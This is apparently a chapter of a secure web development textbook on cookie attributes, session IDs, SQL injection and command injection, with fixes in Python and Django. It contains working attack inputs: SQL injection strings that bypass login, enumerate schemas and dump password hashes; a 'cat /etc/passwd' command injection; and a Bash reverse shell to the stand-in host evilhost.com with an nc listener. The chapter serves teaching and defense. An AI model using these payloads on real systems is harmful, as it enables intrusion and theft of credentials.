© The Author(s), under exclusive license to APress Media, LLC, part of Springer Nature 2022
M. Baker, Secure Web Application Development, https://doi.org/10.1007/978-1-4842-8596-1_7

7. Cookies and User Input

Matthew Baker1  
(1)
Kaisten, Aargau, Switzerland
 

In this chapter, we will look at one of the most common sources of vulnerabilities in a web application: user input. It can pose a threat when it is displayed in web pages, stored on the server, or executed.

We will begin by looking in some detail at how cookies are set by a web server and how they are used by the browser. Incorrect cookie settings are a frequent source of vulnerabilities. We will then examine some common user input-oriented vulnerabilities and how to fix them: injection, server-side request forgery, and cross-site scripting.

7.1 Types of User Input

We often think of user input as being form data that is sent to the server as a POST request, and this is often a source of vulnerabilities. However, we shall see that any data sent from the client to the server, or indeed the server to the client, can be a threat.

We saw in Chapter 1 that there are two classes of attack we must defend against: server side and client side. In server-side attacks, an attacker targets our server through a web client or some other tool. In client-side attacks, the attacker targets a user. The attacker tricks the user into performing some action, usually using tools already on their device such as their web browser. Poor handling of user input can lead to both types of attack.

User input includes
  • Cookies

  • Other HTTP headers, for example, User-Agent

  • Form data, both interactively and programmatically submitted

  • JSON and XML data, for example, in REST API requests and responses

  • Uploads, for example, images

  • URLs including GET parameters and path info

While not exactly user input, JavaScript, even when sent from your own site, can pose the same threats.

We looked at JSON and XML data in the last chapter. We will look at the remainder in the sections that follow.

7.2 Cookies

Cookies are key/value pairs sent from the server to the client in a response header. The client, for example, a web browser, stores them in a file and sends them to the server in a request header if certain conditions are met.

Chrome and Firefox both store cookies in a SQLite database. SQLite databases are themselves a single file. Cookies are set by the server with the Set-Cookie header:
Set-Cookie: cookie-name=cookie-settings
where
cookie-settings = cookie-value[; attr-name[=attr-value]…]
An example is
Set-Cookie: lang=en
On subsequent visits to the same site, the browser would send the following back to the server in the request headers:
Cookie: lang=en
Table 7-1. Cookie attributes supported by the Set-Cookie header

| Attribute | Meaning |
| --- | --- |
| Expires=datetime | Do not send the cookie after the given time. The value should be given as weekday, day month year hour:min:sec GMT, for example, Wed, 21 Oct 2015 07:28:00 GMT. |
| Max-Age=secs | Do not send the cookie after the given number of seconds have elapsed. |
| Domain=domain | Only send the cookie for given domains. |
| Path=path | Only send the cookie for URLs under the named path (including subpaths). |
| Secure | Only send the cookie over HTTPS. |
| HttpOnly | Do not allow the cookie to be read by JavaScript code. |
| SameSite=value | Controls how the cookie is sent in cross-site requests. Described in the following text. |

If the browser had multiple cookies for the same site, they would be concatenated with semicolons, for example:
Cookie: lang=en; country=AU
Additional attributes can be specified in the Set-Cookie header, for example:
Set-Cookie: lang=en; Max-Age=86400; HttpOnly

The allowable values are given in Table 7-1.
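As a rough illustration of these headers, the sketch below uses Python's standard http.cookies module to build a Set-Cookie header and to parse a Cookie header. It is only a sketch: a web framework would normally do this for us, and the variable names are our own.

```python
from http.cookies import SimpleCookie

# Server side: build a Set-Cookie header with two attributes.
response_cookies = SimpleCookie()
response_cookies["lang"] = "en"
response_cookies["lang"]["max-age"] = 86400   # lifetime in seconds
response_cookies["lang"]["httponly"] = True   # flag attribute, it has no value
set_cookie_header = response_cookies.output()  # begins "Set-Cookie: lang=en"

# Server side: parse the Cookie header the browser sends back.
request_cookies = SimpleCookie()
request_cookies.load("lang=en; country=AU")
received = {name: morsel.value for name, morsel in request_cookies.items()}

print(set_cookie_header)
print(received)
```

The order in which the attributes appear in the generated header is chosen by the library and has no significance to the browser.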

The Expires and Max-Age Attributes

The Max-Age attribute instructs the client when to stop sending the cookie, as a number of seconds from when it is received. The Expires attribute does the same thing but as an absolute time and date. It makes little sense to send both; if both are present, Max-Age takes precedence. If neither is set, the cookie is a session cookie, which is deleted once the browser is closed. A Max-Age of zero or less expires the cookie immediately.
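The relationship between the two attributes can be sketched in a few lines of Python. The function name expires_value is our own; it converts a Max-Age, counted from the moment the cookie is received, into the equivalent Expires date string.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime


def expires_value(received_at: datetime, max_age_seconds: int) -> str:
    """Return the Expires date equivalent to a Max-Age counted from received_at."""
    expiry = received_at.astimezone(timezone.utc) + timedelta(seconds=max_age_seconds)
    # usegmt=True produces the "GMT" suffix used in HTTP date headers.
    return format_datetime(expiry, usegmt=True)


received_at = datetime(2015, 10, 20, 7, 28, 0, tzinfo=timezone.utc)
print(expires_value(received_at, 86400))  # one day later
```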

Domain and Path

By default, the cookie is sent only to the host that set it (based on the host in the URL). It is not sent to any other hosts, including subdomains.

If the Domain attribute is set, the cookie is sent to that domain and its subdomains. For example, if Domain is set to example.com, it is sent to example.com, www.example.com, etc. If it is set to www.example.com, it is sent to www.example.com and any subdomains beneath it, but not to example.com.

If Path is set, it is only sent for URIs under that path. For example, if Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the cookie is sent to all URIs.
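The matching rules for Domain and Path can be approximated as follows. This is a simplified sketch with function names of our own choosing; real browsers apply further checks (for example, for IP addresses and public suffixes such as co.uk) that are omitted here.

```python
def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """True if a cookie with the given Domain attribute is sent to request_host."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")  # a leading dot is ignored
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """True if a cookie with the given Path attribute is sent for request_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # The match must end on a path segment boundary: /api must not match /apiary.
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


print(domain_matches("www.example.com", "example.com"))
print(domain_matches("example.com", "www.example.com"))
print(path_matches("/api/call1", "/api"))
print(path_matches("/apiary", "/api"))
```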

The Secure and HttpOnly Attributes

The Secure flag prevents the cookie from being sent to the server when the connection is not encrypted. This is especially important when cookies contain sensitive data such as session IDs. It is important to remember, however, that the cookie is still stored unencrypted on the user’s computer.

The HttpOnly flag prevents the cookie from being readable in JavaScript. In other words:
<script>
    alert(document.cookie)
</script>

will not display the cookie if HttpOnly was set. We will return to this later in the chapter when we talk about cross-site scripting.

The SameSite Cookie Setting

The SameSite attribute controls in what cross-site circumstances the cookie is sent.

If set to None, the cookie is always sent. However, modern versions of Chrome and Firefox will not send it at all unless the Secure flag is set and the page is loaded over HTTPS.

If set to Lax, then the cookie is not sent when following a link from another domain unless it is a top-level page load and a “safe” HTTP method (GET, HEAD, or OPTIONS). This means, for example, that the cookie would not be sent when loading a URL in an IMG tag on a different site.

If set to Strict, the cookie is only sent when following a link from the same domain or loading a URL directly (typing a URL into the address bar or clicking a link in an email or other application). This is summarized in Table 7-2.
Table 7-2. The cookie SameSite attribute

| Situation | None | Lax | Strict |
| --- | --- | --- | --- |
| Following links from the same domain | Sent | Sent | Sent |
| Direct navigation (URL typed in an address bar, URL from an email clicked on, link from other application) | Sent | Sent | Sent |
| Following safe top-level links from a different domain | Sent | Sent | Not Sent |
| Following other links from a different domain | Sent | Not Sent | Not Sent |

The behavior when following a link in an email when SameSite is Strict is often a source of confusion. If following a link from a nonbrowser application, such as an email client or Word document, the cookie is sent. If using a web-based email client, clicking the link is a cross-domain navigation, just like clicking a link on any other website. In this situation, the cookie is not sent.
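The rules in Table 7-2 can be written as a small decision function. This is our own simplified model, not browser code: the parameter names are assumptions, and it ignores the requirement that SameSite=None cookies also carry the Secure flag.

```python
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def cookie_is_sent(same_site: str, cross_site: bool, top_level: bool, method: str) -> bool:
    """Model of Table 7-2: is a cookie with this SameSite value sent with the request?

    cross_site: the request was triggered by a page on a different site
                (False for same-site links and for direct navigation).
    top_level:  the request loads a whole page, not an image, frame, or script call.
    """
    if not cross_site:
        return True
    if same_site == "None":
        return True
    if same_site == "Lax":
        return top_level and method.upper() in SAFE_METHODS
    if same_site == "Strict":
        return False
    raise ValueError("unknown SameSite value: " + same_site)


# A link clicked in web-based email is a cross-site, top-level GET.
print(cookie_is_sent("Lax", cross_site=True, top_level=True, method="GET"))
print(cookie_is_sent("Strict", cross_site=True, top_level=True, method="GET"))
```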

It is important to remember that the cookie attributes are directives to the browser. The server cannot control whether the browser will honor them. A user is also free to edit the browser’s cookie file and change its attributes, and also the name and value. Application security should therefore not depend on the cookie remaining unchanged, unless it is very difficult for a user or attacker to guess or derive another value (as should be the case for session cookies, for example).

Session ID Cookies

Session ID cookies are a common way for websites to keep a user logged in between requests. As HTTP is stateless, the only way to associate a user with a request is to store something on both the client and server that can be matched against each other.

When a user sends a server a username and password, for example, through a web form, the application’s back-end code can look those up in the user table of its database (in practice, the database will probably have a hashed version of the password instead of cleartext). If they match, the server creates a token. This is the session ID and can be as simple as a random string. This session ID, the user ID, and an expiry date are stored in a table on the server, and the token is sent, with a matching expiry, as a cookie to the client.

Whenever the client sends the session ID to the server, it is matched against the session table. If there is a matching row, and the expiry date has not passed, the user ID is extracted from that row, and the user is considered logged in.
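The mechanism just described can be sketched in plain Python. Here a dictionary stands in for the session table, and the function names are our own; a real application would store sessions in a database and let its framework manage them.

```python
import secrets
from datetime import datetime, timedelta, timezone

# Stand-in for the session table: session ID -> (user ID, expiry time).
SESSIONS = {}


def create_session(user_id, lifetime=timedelta(hours=1), now=None):
    """Called after the username and password have been verified."""
    now = now or datetime.now(timezone.utc)
    session_id = secrets.token_urlsafe(32)  # random and hard to guess
    SESSIONS[session_id] = (user_id, now + lifetime)
    return session_id  # sent to the client as the cookie value


def lookup_user(session_id, now=None):
    """Return the logged-in user ID, or None if the session is unknown or expired."""
    now = now or datetime.now(timezone.utc)
    entry = SESSIONS.get(session_id)
    if entry is None:
        return None
    user_id, expiry = entry
    if now >= expiry:
        del SESSIONS[session_id]  # remove the stale row
        return None
    return user_id


token = create_session(user_id=42)
print(lookup_user(token))
print(lookup_user("made-up-token"))
```

Because the token is random, an attacker who edits their cookie has no practical way of guessing another user's session ID.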

In Django, the cookie is called sessionid by default, and session table in the database is called django_session. The session ID is in the column session_key. The user ID is in the column session_data. It is serialized as JSON, signed with Django’s secret key, compressed, and Base64 encoded. The signing is to prevent the database row being tampered with, for example, assigning a different user ID to an existing session ID or creating a new session ID.

The user ID can be extracted from a row's session_data with the following code:
from importlib import import_module
from django.conf import settings
SessionStore = import_module(settings.SESSION_ENGINE).SessionStore
user_id = SessionStore().decode(session_data).get('_auth_user_id')

This is rarely necessary in practice as it is done by Django automatically. The user object is available as request.user in each view. If there is no session ID, or it is invalid, request.user is an AnonymousUser object, whose is_authenticated attribute is False.

Session IDs and the SameSite Setting

The SameSite attribute has a noticeable impact on session ID cookies. Imagine a user logs into a site coffeeshop.com. If successful, the server sends a session ID cookie in the response. Imagine it sets SameSite to None (together with the Secure flag, which modern browsers require for SameSite=None). The header would look like this:
Set-Cookie: sessionid=session-token; SameSite=None; Secure
Let us look at the situations where the cookie will be sent by the browser:
  • If the user follows a link from a page in coffeeshop.com to another page on the same domain, the cookie will be sent.

  • If the user types coffeeshop.com/someurl/ into the browser, the cookie will be sent.

  • If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it, the cookie will be sent.

  • If the user follows a link to coffeeshop.com from another site, the cookie will be sent.

In all cases, the site will receive the session ID, and the user will be considered logged in without having to enter a username and password.

Now consider what happens if SameSite is set to Lax. The cookie will only be sent
  • If the user follows a link from a coffeeshop.com page to another page on the same domain

  • If the user types coffeeshop.com/someurl/ into the browser

  • If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it

  • If the user follows an ordinary link (a top-level GET request) to coffeeshop.com from another site

In all these cases, the user will be considered logged in. The cookie will not be sent with other cross-site requests, for example, when another site submits a form to coffeeshop.com with POST or loads a coffeeshop.com URL in an IMG tag.

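Finally, if SameSite is set to Strict, the cookie will only be sent if the user follows a link from a coffeeshop.com page to another page on the same domain, types the URL into the browser, or clicks a link in an email or other nonbrowser application. If the user arrives by following a link on another site, the cookie is not sent, and the user will have to log in again.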

Setting the SameSite value inappropriately can lead to certain attacks such as cross-site request forgery. We will investigate these in Chapter 8.

7.3 Injection Attacks

Injection refers to vulnerabilities where a user can submit input that is executed in some way on the server. If an input field is not validated, an attacker can insert malicious code or data. Usually, the user-entered code is concatenated with code on the server, rather than being a complete command in itself.

The most well-known injection vulnerability is SQL injection. The most common source is form fields (e.g., username/password fields, search fields), but the vulnerability can exist anywhere where data is captured from the client and executed on the server in a SQL query. Other places can include GET parameters or REST API calls.

Other types of injection include command injection, where OS commands are executed (e.g., Bash commands executed through Python’s os.system() function), and code injection (e.g., executing Python code through its eval() function). Cross-site scripting, which is effectively injecting HTML and JavaScript code, is discussed later in this chapter.

7.4 SQL Injection

Imagine a web page that asks for a user to log in by entering a username and password into an HTML form:
<form method="POST" action="/login">
<p><input type="text" name="username" placeholder="Username"></p>
<p><input type="password" name="password" placeholder="Password"></p>
<p><button type="submit">Sign in</button></p>
</form>
The handler for the /login URL has the following code for checking if the credentials are correct:
# Vulnerable: user input is concatenated directly into the SQL string
password_hash = hashlib.md5(password.encode()).hexdigest()
sql = ("select user_id from User where username = '" + username
    + "' and password = '" + password_hash + "'")
with connection.cursor() as cursor:
    cursor.execute(sql)
    row = cursor.fetchone()
    ...

Here, username and password are taken from the two form input fields.

If the user enters a username and password that match an entry in the User table, a row will be returned by the SQL query, and the user will be logged in.

Let’s say an attacker enters the following in the username field and some random text (say, xxx) in the password field:
bob'--
When the server code is executed, the sql variable will contain the following, where bob'-- is the text the attacker entered and hash-of-xxx stands for the MD5 hash of xxx:
select user_id from User where username = 'bob'--' and password = 'hash-of-xxx'
The -- begins a comment in SQL, so everything after it is ignored. The SQL engine will therefore only see the following:
select user_id from User where username = 'bob'

So long as the user bob exists, a row will be returned regardless of what the password is. The attacker will be logged in.

If the attacker did not know a valid username, they could enter the following for the username:
anyusername' or 1=1 limit 1--
Ignoring the part after the comment, the SQL engine will execute
select user_id from User where username = 'anyusername' or 1=1 limit 1

Regardless of whether a user called anyusername exists, the or 1=1 clause will select all rows from the User table. In case multiple rows break subsequent code, the attacker adds limit 1 to restrict the output to a single row.
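Both attacks can be reproduced safely against a throwaway database. The sketch below uses Python's built-in sqlite3 module with an in-memory database rather than Postgres, purely so that it runs without a server; the table contents are invented, and MD5 is used only to mirror the example above.

```python
import hashlib
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table User (user_id integer primary key, username text, password text)")
conn.execute("insert into User (username, password) values (?, ?)",
             ("bob", hashlib.md5(b"bobs-real-password").hexdigest()))


def vulnerable_login(username, password):
    """Builds the query by string concatenation, as in the vulnerable handler."""
    password_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("select user_id from User where username = '" + username
           + "' and password = '" + password_hash + "'")
    return conn.execute(sql).fetchone()


print(vulnerable_login("bob", "xxx"))                            # wrong password
print(vulnerable_login("bob'--", "xxx"))                         # password check commented out
print(vulnerable_login("anyusername' or 1=1 limit 1--", "xxx"))  # no valid username needed
```

The first call returns no row, as it should. The other two return a row even though the password is wrong.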

If the database user allows the creation of User table entries, the attacker could enter text in the username field that causes the following to be executed:
select user_id from User where username = 'anyusername' or 1=1 LIMIT 1;
    insert into User (username, password) values ('myusername', 'mypasswordhash')--

The semicolon ends a SQL statement and begins a new one. Not only would the attacker be logged in as the first user in the order rows are returned but would also be able to create their own user. Similarly, the attacker could delete or alter rows.

Schema Discovery

Each of the preceding examples required that the attacker know the column names in the user table, though username and password would have been obvious guesses. The last example required the attacker to know that the user table is called User. In Django, this is not the case; it is auth_user. The attacker could of course try many different names (auth_user is also a sensible guess, as many applications are built with Django). However, an attacker could also query the schema to find out what the table is called.

Imagine a search form that looks something like the following:
<form method="POST" action="/search">
<p><input name="search" placeholder="Enter search term"></p>
<p><button type="submit">Search</button></p>
</form>

Clicking Search causes matches to be displayed in a page.

The SQL query is constructed on the server with
sql = ("select name, description from Product "
    + "where name like '%" + searchterm + "%' OR description like '%"
    + searchterm + "%'")
Now imagine the attacker enters the following in the search field:
xxx' union select schemaname, tablename from pg_catalog.pg_tables--

The union keyword joins two select queries together. The only requirement is that the number and types of the selected columns match. In the server code, two varchar columns, name and description, are selected. The attacker ensures they select two columns of type varchar.

The pg_catalog.pg_tables view in Postgres contains the names of all the tables in the database. Fortunately for the attacker, it has two useful string columns: schemaname and tablename.

Most likely, no results will be returned by the actual search string xxx. However, the other select statement will return all the schema and table names in the database as part of the search results.
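The same technique can be tried out locally with sqlite3. Note the assumption: SQLite has no pg_catalog.pg_tables, so this sketch queries SQLite's own catalog table, sqlite_master, instead. The table names and product data are invented.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table Product (name text, description text)")
conn.execute("create table auth_user (username text, password text)")
conn.execute("insert into Product values ('Dark roast', 'A dark, rich coffee')")


def vulnerable_search(searchterm):
    """Builds the search query by string concatenation."""
    sql = ("select name, description from Product "
           + "where name like '%" + searchterm + "%' OR description like '%"
           + searchterm + "%'")
    return conn.execute(sql).fetchall()


print(vulnerable_search("dark"))
# The union appends one row per table in the database to the search results.
print(vulnerable_search("xxx' union select type, name from sqlite_master--"))
```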

Now the attacker does not have to know what the user table is called. They can get Postgres to tell them. They do have to know that Postgres is the database engine. They could just try the correct syntax for all popular databases—there are not that many. Alternatively, they could run nmap. Recall from Chapter 5 that nmap revealed that Postgres was running.

The attacker would still have to know that the search query selected two columns and that they were both varchars. The format of the search results might give them a hint. If not, they could use trial and error. Databases don’t have so many data types, and they could try them exhaustively:
  • int

  • float

  • varchar

  • int, int

  • int, float

  • int, varchar

and so on. If the query included a float, say, they would be unable to find a matching column in pg_catalog.pg_tables. However, they could select a hard-coded value:
xxx' union select tablename, 0.0 from pg_catalog.pg_tables--

Once they find a query that works, they can run a few more: one to get the schema names, another to get the column names, and so on. This is another reason why detailed error messages should not be displayed for users—it can reveal the schema to attackers. Hiding errors may not prevent a determined attack, but the attacker will need more queries, which may be noticed when monitoring logs or traffic.

Of course our attacker would probably not enter all these queries manually. They would script them, or use an existing tool. One open source tool is sqlmap.1

Finding SQL Injection Vulnerabilities

The easiest way for an attacker to spot a SQL injection vulnerability is to enter a single quote in a form field by itself and see if an error is raised. Say the form field was a search box. If the server code is secure, entering a single quote should either return no results or return results that really did contain a single quote. If a vulnerability exists, the server would either return an error or something indicating the code failed, for example, a blank page.
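The single-quote probe is easy to demonstrate. In this sketch (sqlite3 again, with function names of our own), the concatenated query fails with a database error, whereas a query that passes the search term as a parameter simply returns no results.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table Product (name text)")
conn.execute("insert into Product values ('Dark roast')")


def vulnerable_search(term):
    return conn.execute(
        "select name from Product where name like '%" + term + "%'").fetchall()


def safe_search(term):
    return conn.execute(
        "select name from Product where name like ?", ("%" + term + "%",)).fetchall()


def probe(search_function):
    """Submit a lone single quote and report how the search code reacts."""
    try:
        search_function("'")
    except sqlite3.Error:
        return "error"
    return "ok"


print(probe(vulnerable_search))
print(probe(safe_search))
```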

Defending Against SQL Injection

The obvious defense against SQL injection is to sanitize user input—escape or remove quote characters, semicolons, dashes, etc. However, this must be done carefully. For example, code to filter out a single quote is often confused if the string contains a null byte before it. Therefore, the string
%00'

may well prevent the quote deletion from succeeding. Hackers also replace a single quote with its URL-encoded form, %27, to avoid detection.

A far safer defense is to not use string concatenation at all. Instead, use prepared statements.

Prepared statements are a feature of SQL engine APIs. Placeholders are inserted into the SQL query where user-provided data is expected. The statement is compiled, and the user input is passed as a parameter to the execution function along with the compiled SQL statement. They also improve performance, especially if the query is reused, as it only needs to be compiled once.

The syntax varies between SQL libraries. Our VMs use psycopg2. An example prepared statement is as follows:
cursor.execute('select * from Product where name = %s', (myname,))
The placeholder is %s. The cursor.execute() function takes the SQL statement and, after the comma, a sequence of parameters to substitute for the placeholders, in this case myname. Even a single parameter must be passed as a sequence, hence the one-element tuple (myname,). Multiple parameters are passed in the same way, for example:
cursor.execute('select * from Product where name = %s and description = %s', (myname, mydesc))

If the user-provided name or description contains quotes, comment characters, semicolons, etc., they will be part of the placeholder replacement, not additional SQL query syntax.

Note that %s is the placeholder for all data types, not just strings. For example, use %s, not %d, for integers.
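To see the effect of passing parameters separately, here is a login check rewritten with placeholders. It is a sketch using sqlite3 so that it runs without a database server; note that sqlite3's placeholder is ? rather than psycopg2's %s. The data is invented, and MD5 is kept only to mirror the earlier example.

```python
import hashlib
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table User (user_id integer primary key, username text, password text)")
conn.execute("insert into User (username, password) values (?, ?)",
             ("bob", hashlib.md5(b"bobs-real-password").hexdigest()))


def safe_login(username, password):
    """User input is passed as parameters, never concatenated into the SQL."""
    password_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "select user_id from User where username = ? and password = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()


print(safe_login("bob", "bobs-real-password"))
print(safe_login("bob'--", "xxx"))  # treated as a (nonexistent) username
```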

Also, it is important to separate the SQL string from the parameters with a comma, not a percent. The following is Python’s formatted string syntax and is as vulnerable as string concatenation:
cursor.execute('select * from Product where name = %s' % myname) # don't do this!
The psycopg2 package makes it a bit harder for us when we want to use a like clause, for example:
sql = "select * from Product where name like '%" + myname + "%'"
Firstly, the percent characters would have to be quoted by doubling them so that psycopg2’s percent substitution doesn’t try to process them:
sql = "select * from Product where name like '%%%s%%'"
...
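cursor.execute(sql, (myname,)) # doesn't work
However, this still does not work. psycopg2’s automatic type conversion will put quotes around the contents of myname, breaking the syntax. Instead, the whole pattern, including the wildcards, has to be passed as the parameter. We should also escape any percent, underscore, or backslash characters in the search term itself, in case the user entered one as part of the search string; otherwise, like would treat them as wildcards or escape characters. Postgres uses a backslash as the default escape character in like patterns. Percent characters inside a parameter value do not need doubling, as psycopg2 only processes the placeholders in the SQL string. The following code is rather ugly but works.
sql = "select * from Product where name like %s"
...
pattern = myname.replace('\\', '\\\\').replace('%', '\\%').replace('_', '\\_')
cursor.execute(sql, ('%' + pattern + '%',)) # works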
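One way to build a like pattern that treats the user's text literally is to put the escaping in a small helper. The helper name like_contains is our own. The demonstration uses sqlite3, which, unlike Postgres, has no default escape character, so the query names one explicitly with an escape clause.

```python
import sqlite3


def like_contains(term: str, escape: str = "\\") -> str:
    """Return a like pattern matching rows that contain term literally."""
    escaped = (term.replace(escape, escape + escape)  # escape the escape character first
                   .replace("%", escape + "%")
                   .replace("_", escape + "_"))
    return "%" + escaped + "%"


conn = sqlite3.connect(":memory:")
conn.execute("create table Product (name text)")
conn.executemany("insert into Product values (?)",
                 [("50% off beans",), ("500g beans",)])

sql = "select name from Product where name like ? escape '\\'"
print(conn.execute(sql, (like_contains("50%"),)).fetchall())
```

Without the escaping, the percent sign in 50% would act as a wildcard, and both products would match.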
SQL Injection
The queries and code for this exercise are in the
/vagrant/snippets/injection.txt

file inside the Coffeeshop VM.

The Coffeeshop application has a SQL vulnerability in the search function. Visit the Coffeeshop URL at

http://10.50.0.2

and enter a search term (e.g., dark). Now take a look at the code (search() in views.py). The vulnerability exists because of these lines:
template = ("SELECT id, name, description, unit_price" +
        "    FROM coffeeshop_product" +
        "   WHERE (LOWER(name) like '%{}%'" +
        "          or LOWER(description) like '%{}%') ")
sql = template.format(search_text.lower(), search_text.lower())

We will exploit the vulnerability by using the search term to display all usernames and hashed passwords from the auth_user table (columns username and password).

The query will be a bit more complex than the previous examples because we have an open parenthesis, which must be closed to make the SQL valid. Enter the following query into the search box:
xxx') union select id, username, password, 0.0 from auth_user --

and press Enter. You should see usernames and passwords in the search results.

Our union has to have matching data types for the selects on either side. As the code selects an integer, two strings, and a float, we have to select the same after the union. As the auth_user table has no float columns, we select a constant value.

Let’s now perform an update to make bob a superuser. We do this in Django by setting the is_staff and is_superuser columns to true:
xxx'); update auth_user set is_staff=true, is_superuser=true where username = 'bob' --

Press Enter to run the query. You should now be able to visit the admin page http://10.50.0.2/admin and log in as bob (his password is in coffeeshop.com/secrets/config.env).

We don’t want bob to be a superuser so reset his permissions, either with another SQL injection command or using the Admin page.

Removing the Vulnerability

To fix the vulnerability, we just turn the SQL statement into a prepared statement. Edit
vagrant/coffeeshopsite/coffeeshop/views.py
Inside the search() function, inside the if (search_text is not None and search_text != ""): block, change the code to read:
with connection.cursor() as cursor:
    sql = '''SELECT id, name, description, unit_price
               FROM coffeeshop_product
              WHERE (LOWER(name) like %s or LOWER(description) like %s)
          '''
    print(sql)
    products = []
    try:
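        # escape like wildcards so that they are matched literally
        escaped = (search_text.lower().replace('\\', '\\\\')
                   .replace('%', '\\%').replace('_', '\\_'))
        search_term = '%' + escaped + '%'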
        cursor.execute(sql, (search_term, search_term))
        for row in cursor.fetchall():
            (pk, name, description, unit_price) = row
            product = Product(id=pk, name=name, description=description,
                unit_price=unit_price)
            products.append(product)
    except Exception as e:
        log.error("Error in search: " + sql)
After doing so, you will have to restart Apache with
sudo apachectl restart

to pick up the code changes. If you have errors, they will be in /var/log/apache2/error.log.

After fixing the vulnerability, confirm that a legitimate search still works and that SQL injection does not.

7.5 Command Injection

Command injection vulnerabilities are similar to SQL injection. The difference is that user-supplied text is concatenated with a shell command that is executed on the server, rather than SQL code that is executed by the database.

Imagine an application that scales an image by a percentage supplied by the user:
os.system('convert myimage.jpg -resize ' + scale + '% newimage.jpg')
By now, you probably recognize why a vulnerability exists. If, for the scale term, an attacker entered
50% newimage.jpg && cat /etc/passwd #

then the server would execute the convert command as expected but would then print out the contents of the system password file. The double ampersand is the Bash AND operator: it runs the second command if the first succeeds and is an effective way of joining two commands into a single command line. The hash is the comment character, so the rest of the original command is ignored. If the output were captured and displayed in the response, the attacker would be able to view the system users.
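The effect can be observed safely by substituting a harmless command. In the following sketch, which assumes a POSIX shell, echo stands in for both convert and cat /etc/passwd, and the function name is our own. It deliberately uses shell=True, which behaves like os.system() but lets us capture the output.

```python
import subprocess


def vulnerable_resize(scale: str) -> str:
    """Builds a shell command by concatenation (echo stands in for convert)."""
    command = "echo resizing to " + scale + "% newimage.jpg"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


print(vulnerable_resize("50"))
# The injected text ends the first command, adds a second, and comments out the rest.
print(vulnerable_resize("50% newimage.jpg && echo INJECTED #"))
```

The second call prints an extra line, INJECTED, produced by a command that the developer never wrote.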

In this example, the output is not captured. It is, however, still a useful vulnerability for an attacker. Consider the following value for the scale term:
50% newimage.jpg && bash -c 'bash -i >& /dev/tcp/evilhost.com/9000 0>&1' #

This initiates a reverse shell. A normal shell session is initiated by a client connecting to a port on the server and gives the client an interactive session on the server. A reverse shell works in the opposite direction: the compromised machine (here, our web server) makes an outgoing connection to a port on the attacker’s machine, and the attacker gets an interactive session on the compromised machine. The >& redirects standard output and standard error. In normal usage, this would be to a file. However, Bash allows them to be redirected to a TCP port, as in this example. The 0>&1 redirects standard input to the same port. The result is that when Bash runs, the input and output are read from and written to the remote TCP port. The -i creates an interactive shell.

The outer Bash command is needed because os.system() runs its argument through /bin/sh, which is not necessarily Bash. The /dev/tcp redirection is a Bash feature, so we need an additional Bash command to interpret it.

The attacker runs a command on their server evilhost.com to open a port, in this example 9000, to listen for connections. The easiest way is with the nc command:
nc -l evilhost.com 9000

Once a connection is established, the nc command simply prints anything received on the given port to the terminal and sends terminal input to the port.

When the os.system() command is executed, the Bash command is run and connects to the hacker’s open port. The hacker can type commands, and they will be executed on the remote server. The output will be sent to the hacker’s port. As the Bash command was started by Apache, it will be running as the same user, typically www-data, with that user’s privileges.

In the last chapter, we discussed the danger of running a web server with more permissions than necessary. The consequences should now be clear. If this vulnerability exists and www-data has write permission on the code, the attacker can change your application. The attacker can also connect to the database and run any query permitted by the web server’s database user.

Back Doors

A reverse shell is an example of a back door: an entry point an attacker uses that was not intended by the developer. In our example, the developer expects connections over HTTP and HTTPS on ports 80 and 443, but the attacker has created a Bash entry point on port 9000.

A Bash shell using nc is useful for an attacker and dangerous for the application. However, it is still rather limiting: the attacker must be present to interactively operate the shell, it only accepts one connection at a time, and file upload and download are difficult to enact.

Fortunately for attackers, other back doors exist. It is not hard to see how nc could be replaced by a more sophisticated application that spawns a new thread for each connection and that automates commands rather than requiring them to be entered interactively.

Also fortunately for attackers, tools already exist with more features. Metasploit2 is a popular framework with many exploits built in and is also extensible. Metasploit contains exploits and payloads. Exploits are modules that take advantage of a vulnerability. One example is Metasploit’s web_delivery exploit, which takes advantage of a vulnerable web form.

Once the exploit has been executed, Metasploit delivers a payload. The user can select from a number that are supported by each exploit. A Bash reverse shell over TCP (such as the one we showed in our example) is one option, but Metasploit makes an additional 20 available for the web_delivery exploit.

Metasploit also has staged payloads. These are delivered in parts. Once the exploit is executed, Metasploit delivers a small payload whose purpose is to download a larger one with more features. The python/meterpreter/reverse_tcp payload in Metasploit has, for example, file upload and download commands.

Defending Against Command Injection

Firstly, system commands should be used very sparingly. If developing an application in Python, use Python commands and packages wherever possible, rather than making system calls.

If making a system call is necessary, the subprocess package is safer than os.system(). We could replace our vulnerable os.system() call with
subprocess.run(['convert', 'myimage.jpg', '-resize', scale + '%', 'newimage.jpg'])

This syntax is more secure because the scale variable (with % appended to it) is always treated as a single command-line argument. Adding spaces, semicolons, ampersands, and comment characters will only ever add them to the argument, not create additional arguments or commands.

The subprocess.run() function also has an optional parameter to run a full command from a string, similar to os.system():
subprocess.run(cmd, shell=True) # don't do this

You should avoid this as it is as insecure as os.system().
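The list form can be combined with input validation for defense in depth. The sketch below is one possible approach, not the only one: resize_args and the 1 to 400 range are our own assumptions. The second function uses echo to show that, without a shell, malicious text stays inside a single argument.

```python
import subprocess


def resize_args(scale: str) -> list:
    """Validate scale and return the argument list for convert."""
    percent = int(scale)            # raises ValueError for anything but an integer
    if not 1 <= percent <= 400:     # arbitrary limits chosen for this sketch
        raise ValueError("scale out of range")
    return ["convert", "myimage.jpg", "-resize", f"{percent}%", "newimage.jpg"]


def echo_without_shell(scale: str) -> str:
    """No shell is involved, so && and # have no special meaning."""
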